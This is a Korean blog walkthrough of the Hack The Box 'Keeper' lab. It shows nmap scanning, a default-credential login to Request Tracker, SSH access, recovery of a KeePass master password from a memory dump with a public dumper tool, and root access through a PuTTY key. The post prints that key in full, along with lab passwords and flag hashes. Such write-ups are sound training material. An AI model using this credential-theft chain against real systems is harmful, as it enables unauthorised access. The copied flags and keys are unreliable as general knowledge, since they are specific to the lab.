Oh! JUN
[Hack The Box] Keeper 본문
Hack The Box
app.hackthebox.com
=====================
# 공격대상 : 10.10.11.227
# 공격자 : 10.10.14.137
==================================================================================================================
| 1. 포트 스캐닝 |
=========================================================================================
# nmap의 핑 프로브를 차단하고 있음
┌──(kali㉿kali)-[~/keeper]
└─$ nmap -A 10.10.11.227 -T5
----------------------------------------------------------------------------------
Starting Nmap 7.93 ( https://nmap.org ) at 2024-02-07 08:39 EST
Note: Host seems down. If it is really up, but blocking our ping probes, try -Pn
Nmap done: 1 IP address (0 hosts up) scanned in 2.47 seconds
----------------------------------------------------------------------------------
# -Pn : 핑 프로브 없이 스캔을 수행할 수 있음
┌──(kali㉿kali)-[~/keeper]
└─$ nmap -Pn 10.10.11.227 -T5
----------------------
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
----------------------
┌──(kali㉿kali)-[~/keeper]
└─$ nmap -Pn -A 10.10.11.227 -T5 -p 22,80 -oA keeper_ps
-----------------------------------------------------------------------------------
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 8.9p1 Ubuntu 3ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 256 3539d439404b1f6186dd7c37bb4b989e (ECDSA)
|_ 256 1ae972be8bb105d5effedd80d8efc066 (ED25519)
80/tcp open http nginx 1.18.0 (Ubuntu)
|_http-title: Site doesn't have a title (text/html).
|_http-server-header: nginx/1.18.0 (Ubuntu)
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
-----------------------------------------------------------------------------------=========================================================================================
| 2. 웹 페이지 진단 |
=========================================================================================
# firefox 열고 'http://10.10.11.227' 실행하면 *.keeper.* 도메인이 변경되면서 인식 못함
--------------------------------------------------------
firefox : 'http://10.10.11.227' error
--------------------------------------------------------
# /etc/hosts에서 IP주소와 도메인주소 매핑해줌.
# *.keeper.* 도메인 주소가 공격대상(10.10.11.227)로 인식되면서 접속 됨.
┌──(kali㉿kali)-[~/keeper]
└─$ cat /etc/hosts
-----------------------------------
10.10.11.227 tickets.keeper.htb
10.10.11.227 keeper.htb
-----------------------------------
# 접속하면 로그인 페이지가 뜨게되는데 기본 id, pw로 이루어져 있음
---------------------------------------------------
Login 4.4.4+dfsg-2ubuntu1
---------------------------------------------------
Username : root
Passwrod : password
---------------------------------------------------
Login
---------------------------------------------------
# 상위 메뉴에서 'Admin - Users'이 유독 눈에 들어옴
# 'lnorgaard', 'root' 계정이 있는데 'lnorgaard'은 'Welcome2023!' 패스워드 알 수 있음.==========================================================================================
| 3. guest 계정 접속 |
==========================================================================================
# 'lnorgaard'계정으로 공격대상에 접속
┌──(kali㉿kali)-[~/keeper]
└─$ ssh lnorgaard@10.10.11.227
# user.txt 플래그 찾을 수 있음
lnorgaard@keeper:~$ ls -alh
--------------------------------------------------------------
-rw-r----- 1 root lnorgaard 33 Feb 7 11:22 user.txt
-rw-r--r-- 1 root root 84M Feb 7 14:58 RT30000.zip
--------------------------------------------------------------
lnorgaard@keeper:~$ cat user.txt
---------------------------------
dfd647a85990780c39e000c082cd728a
---------------------------------===========================================================================================
| 4. RT30000.zip 분석 |
===========================================================================================
# 무려 84MB 사이즈의 RT30000.zip 파일이 눈에 뜀
--------------------------------------------------------------
-rw-r--r-- 1 root root 84M Feb 7 14:58 RT30000.zip
--------------------------------------------------------------
# 공격대상(lnorgaard@10.10.11.227)에서 공격자(kali)로 RT30000.zip 파일 가져오기(원격에서는 도구 사용하기 힘듬)
# scp는 용량이 커서 그런가 32%에서 멈춤
┌──(kali㉿kali)-[~/keeper]
└─$ rsync -avz -e ssh lnorgaard@10.10.11.227:/home/lnorgaard/RT30000.zip .
┌──(kali㉿kali)-[~/keeper]
└─$ unzip RT30000.zip
---------------------------------
Archive: RT30000.zip
inflating: KeePassDumpFull.dmp
extracting: passcodes.kdbx
---------------------------------=====================================================================================================
| 4-1. KeePassDumpFull.dmp 분석 |
=====================================================================================================
# 'passcodes.kdbx' 열기 위해서 'keepassxc' 설치
# Application => keepassxc 실행 => 상단에 Database => Open Database => 'passcodes.kdbx'
# 그런데!! 패스워드가 필요함
┌──(kali㉿kali)-[~/keeper]
└─$ sudo apt-get install keepassxc
# KeePassDumpFull.dmp에서 'passcodes.kdbx'패스워드를 추출할꺼임
# KeePass Master Password Dumper는 KeePass의 메모리에서 마스터 비밀번호를 추출하기 위한 간단한 증명 개념 도구
┌──(kali㉿kali)-[~/keeper]
└─$ wgetwget https://packages.microsoft.com/config/ubuntu/20.04/packages-microsoft-prod.deb -O packages-microsoft-prod.deb
┌──(kali㉿kali)-[~/keeper]
└─$ wgetsudo dpkg -i packages-microsoft-prod.deb
┌──(kali㉿kali)-[~/keeper]
└─$ wgetsudo apt-get install -y apt-transport-https
┌──(kali㉿kali)-[~/keeper]
└─$ wgetsudo apt-get install -y dotnet-sdk-7.0
┌──(kali㉿kali)-[~/keeper]
└─$ dotnet --version
┌──(kali㉿kali)-[~/keeper]
└─$ git clone https://github.com/vdohney/keepass-password-dumper
┌──(kali㉿kali)-[~/keeper]
└─$ cd keepass-password-dumper
┌──(kali㉿kali)-[~/keeper/keepass-password-dumper]
└─$ dotnet run KeePassDumpFull.dmp
-------------------------------------------------------------------------------
Combined: ●{ø, Ï, ,, l, `, -, ', ], §, A, I, :, =, _, c, M}dgrød med fløde
-------------------------------------------------------------------------------
# 'M}dgrød med fløde' 구글링 하니까 'rødgrød med fløde'로 변경되고 덴마크의 디저트랍니다.
--------------------------------------------------------
Google : 'M}dgrød med fløde' => 'rødgrød med fløde'
--------------------------------------------------------===================================================================================================================
| 4-2. passcodes.kdbx 로그인 및 root 계정 접속 |
===================================================================================================================
# 다시, Application => keepassxc 실행 => 상단에 Database => Open Database => 'passcodes.kdbx'
# 패스워드 'rødgrød med fløde'입력
# 왼쪽 메뉴에 Network 클릭하고 root 클릭하면 'root'의 'F4><3K0nd!' 패스워드 확인가능
# ssh 접속하는데 안됨
┌──(kali㉿kali)-[~/keeper]
└─$ ssh root@10.10.11.227
------------------------------------
root@10.10.11.227's password:
Permission denied, please try again.
------------------------------------
# Notes 확인해보자.
# 해당 Notes는 Putty에서 사용하는 키(.PPK)임.
# 그래서 openssh에서 지원하는 형식의 개인키로 변경해줘야 됨.
------------------------------------------------------------------------------
PuTTY-User-Key-File-3: ssh-rsa
Encryption: none
Comment: rsa-key-20230519
Public-Lines: 6
AAAAB3NzaC1yc2EAAAADAQABAAABAQCnVqse/hMswGBRQsPsC/EwyxJvc8Wpul/D
8riCZV30ZbfEF09z0PNUn4DisesKB4x1KtqH0l8vPtRRiEzsBbn+mCpBLHBQ+81T
EHTc3ChyRYxk899PKSSqKDxUTZeFJ4FBAXqIxoJdpLHIMvh7ZyJNAy34lfcFC+LM
Cj/c6tQa2IaFfqcVJ+2bnR6UrUVRB4thmJca29JAq2p9BkdDGsiH8F8eanIBA1Tu
FVbUt2CenSUPDUAw7wIL56qC28w6q/qhm2LGOxXup6+LOjxGNNtA2zJ38P1FTfZQ
LxFVTWUKT8u8junnLk0kfnM4+bJ8g7MXLqbrtsgr5ywF6Ccxs0Et
Private-Lines: 14
AAABAQCB0dgBvETt8/UFNdG/X2hnXTPZKSzQxxkicDw6VR+1ye/t/dOS2yjbnr6j
oDni1wZdo7hTpJ5ZjdmzwxVCChNIc45cb3hXK3IYHe07psTuGgyYCSZWSGn8ZCih
kmyZTZOV9eq1D6P1uB6AXSKuwc03h97zOoyf6p+xgcYXwkp44/otK4ScF2hEputY
f7n24kvL0WlBQThsiLkKcz3/Cz7BdCkn+Lvf8iyA6VF0p14cFTM9Lsd7t/plLJzT
VkCew1DZuYnYOGQxHYW6WQ4V6rCwpsMSMLD450XJ4zfGLN8aw5KO1/TccbTgWivz
UXjcCAviPpmSXB19UG8JlTpgORyhAAAAgQD2kfhSA+/ASrc04ZIVagCge1Qq8iWs
OxG8eoCMW8DhhbvL6YKAfEvj3xeahXexlVwUOcDXO7Ti0QSV2sUw7E71cvl/ExGz
in6qyp3R4yAaV7PiMtLTgBkqs4AA3rcJZpJb01AZB8TBK91QIZGOswi3/uYrIZ1r
SsGN1FbK/meH9QAAAIEArbz8aWansqPtE+6Ye8Nq3G2R1PYhp5yXpxiE89L87NIV
09ygQ7Aec+C24TOykiwyPaOBlmMe+Nyaxss/gc7o9TnHNPFJ5iRyiXagT4E2WEEa
xHhv1PDdSrE8tB9V8ox1kxBrxAvYIZgceHRFrwPrF823PeNWLC2BNwEId0G76VkA
AACAVWJoksugJOovtA27Bamd7NRPvIa4dsMaQeXckVh19/TF8oZMDuJoiGyq6faD
AF9Z7Oehlo1Qt7oqGr8cVLbOT8aLqqbcax9nSKE67n7I5zrfoGynLzYkd3cETnGy
NNkjMjrocfmxfkvuJ7smEFMg7ZywW7CBWKGozgz67tKz9Is=
Private-MAC: b0a0fd2edf4f0e557200121aa673732c9e76750739db05adc3ab65ec34c55cb0
------------------------------------------------------------------------------
# Notes을 'putty_private_key.ppk'에 복사 붙여넣기 해줌
┌──(kali㉿kali)-[~/keeper]
└─$ sudo mousepad putty_private_key.ppk
# 'putty_private_key.ppk'을 'private-openssh' 형식의 'openssh_private_key' 이름으로 변경해줌
┌──(kali㉿kali)-[~/keeper]
└─$ puttygen putty_private_key.ppk -O private-openssh -o openssh_private_key
# 'openssh_private_key'로 root@10.10.11.227 접속
┌──(kali㉿kali)-[~/keeper]
└─$ ssh -i openssh_private_key root@10.10.11.227
root@keeper:~# id
--------------------------------------
uid=0(root) gid=0(root) groups=0(root)
--------------------------------------
root@keeper:~# ls -alh
--------------------------------------------------
-rw-r----- 1 root root 33 Feb 8 07:26 root.txt
--------------------------------------------------
root@keeper:~# cat root.txt
---------------------------------
0d232ade59997522256769bc91656bfc
---------------------------------'문제풀이 > Hack The Box' 카테고리의 다른 글
| [Hack The Box] bizness (0) | 2024.02.19 |
|---|---|
| [Hack The Box] codify (0) | 2024.02.16 |
| [Hack The Box] analytics (0) | 2024.02.14 |
| [Hack The Box] devvortex (0) | 2024.02.14 |
| [Hack The Box] cozyhosting (0) | 2024.02.13 |
'문제풀이/Hack The Box' Related Articles
more
